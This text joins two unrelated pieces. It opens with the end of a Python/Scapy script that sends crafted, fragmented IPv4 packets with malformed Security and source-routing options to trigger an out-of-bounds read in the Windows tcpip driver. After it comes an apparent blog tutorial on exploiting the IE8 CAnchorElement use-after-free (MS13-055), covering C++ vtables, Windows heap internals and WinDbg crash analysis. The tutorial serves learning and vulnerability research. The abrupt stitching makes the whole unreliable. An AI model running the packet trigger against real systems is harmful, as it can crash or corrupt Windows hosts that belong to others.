        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I needed to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact that not only do you need to understand the overarching exploit primitives and vulnerability classes that are specific to Windows, but you also need to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser-specific mitigations has also been a determining factor in my putting off learning this subject.

What has always been frightening is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for me.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As mentioned above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems is 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is pseudo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is that the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. The program is then attempting to access and/or dereference memory that simply isn’t valid anymore, which usually causes some sort of exception, resulting in a program crash.
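
To make that sequence concrete, here is a minimal, contrived C++ sketch of the scenario described above (purely illustrative, unrelated to the browser code we will look at later):

#include <cstdlib>
#include <cstring>

int main()
{
  // Allocate a 0x40-byte chunk and fill it with 0x41 ('A') characters
  char* chunk = static_cast<char*>(malloc(0x40));
  if (chunk == nullptr)
  {
    return 1;
  }
  memset(chunk, 0x41, 0x40);

  // Free the chunk; the heap manager may now reuse this memory to
  // service other allocation requests
  free(chunk);

  // BUG: the stale pointer is used after the free. Depending on the
  // state of the heap this may crash, read garbage, or read data placed
  // there by a newer allocation
  return chunk[0];
}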

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed from within the class itself (protected members, by contrast, can also be accessed by inherited classes, and public members can be accessed by anyone). We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for the class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Their general purpose is to initialize the variables within a class whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating pointers to classOne objects, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* c1 in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as in our case, the delete operator being invoked against one of the previously declared class objects (c1 and c1_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exist is that they allow a developer to prototype a function in a main class, while allowing the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

Recall from a few images ago, where we dumped the table, that we saw our two virtual function addresses. We can see that this time program execution is going to index this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction!
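
To tie this together, here is a rough sketch of how the object, the vptr, and the table relate in this 64-bit example (the layout comments are illustrative, not copied from the debugging session):

; c1   -> [ vptr ]                                 ; first 8 bytes of the object
; vptr -> [ &classTwo::sharedFunction  ]           ; vftable + 0x00
;         [ &classTwo::sharedFunction1 ]           ; vftable + 0x08
mov rax, qword ptr [rcx]        ; RCX = object pointer; load the vptr into RAX
call qword ptr [rax+8]          ; invoke the table entry at offset 0x8 (sharedFunction1)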

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to _free_dbg in UCRTBASED (the debug C Runtime library), to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configures WinDbg to automatically attach to and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. gflags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process: gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourselves with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr - The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be understood that techniques leveraging the heap internals described here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll!_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP) structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.
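
For reference, here is a simplified C-style view of the _HEAP_LIST_LOOKUP members discussed here (field names are taken from the public ntdll symbols; exact offsets and types vary between Windows versions, so treat this as an approximation):

#include <windows.h>

struct _HEAP_LIST_LOOKUP
{
    struct _HEAP_LIST_LOOKUP *ExtendedLookup; // next lookup structure, if any
    ULONG       ArraySize;        // largest block size tracked (0x80 or 0x800 on Windows 7)
    ULONG       ExtraItem;
    ULONG       ItemCount;
    ULONG       OutOfRangeItems;
    ULONG       BaseIndex;        // used, with the request size, to compute the ListHints index
    LIST_ENTRY  *ListHead;
    ULONG       *ListsInUseUlong; // bitmap describing which ListHints entries are populated
    LIST_ENTRY  **ListHints;      // per-size list heads pointing into the FreeLists
};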

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.
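
As an illustration of the 18-consecutive-allocations heuristic mentioned above (a sketch only - our exploit does not need to do this, since the LFH is already enabled for the heap we care about):

#include <windows.h>

int main()
{
    // 18 consecutive allocation requests of the same size are enough to
    // enable the LFH bucket for that size on Windows 7
    for (int i = 0; i < 18; i++)
    {
        HeapAlloc(GetProcessHeap(), 0, 0x68);
    }
    return 0;
}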

In any event, it is still worth talking about the LFH in its entirety, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting, memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap managers, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code at first; the actual root cause is that a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was presented at HitCon 2013. You can view the slides here, which contain a similar proof of concept to the one above. Note that although the elements described do not share the same names as the elements in the HTML, when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact that we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically to how we did earlier, to see if we can identify why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according to the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr [eax+70h]. If we disassemble around the current instruction pointer, we can see something that is very reminiscent of the assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is at 0x0, entry 2 is at 0x8, entry 3 would be at 0x10, entry 4 would be at 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the fetching of the vptr via [ecx]. The pointer to the object is in ECX, and dereferencing it loads the vptr into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take that pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (whichever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines is very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by ECX in this case, whose first value is the vptr. It is only when we dereference the memory that we can see this chunk is actually invalid.

Moving on, taking a look at the call stack, we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which are simply lists of the function calls that led to where execution currently resides, the bottom function is where the chain started, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we would like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that we can fill this freed chunk with our own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.
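
For reference, the documented prototype looks like this:

BOOL HeapFree(
  HANDLE hHeap,   // handle to the heap the chunk was allocated from
  DWORD  dwFlags, // freeing flags
  LPVOID lpMem    // pointer to the chunk of memory to free
);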

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, function arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass arguments to a function call.

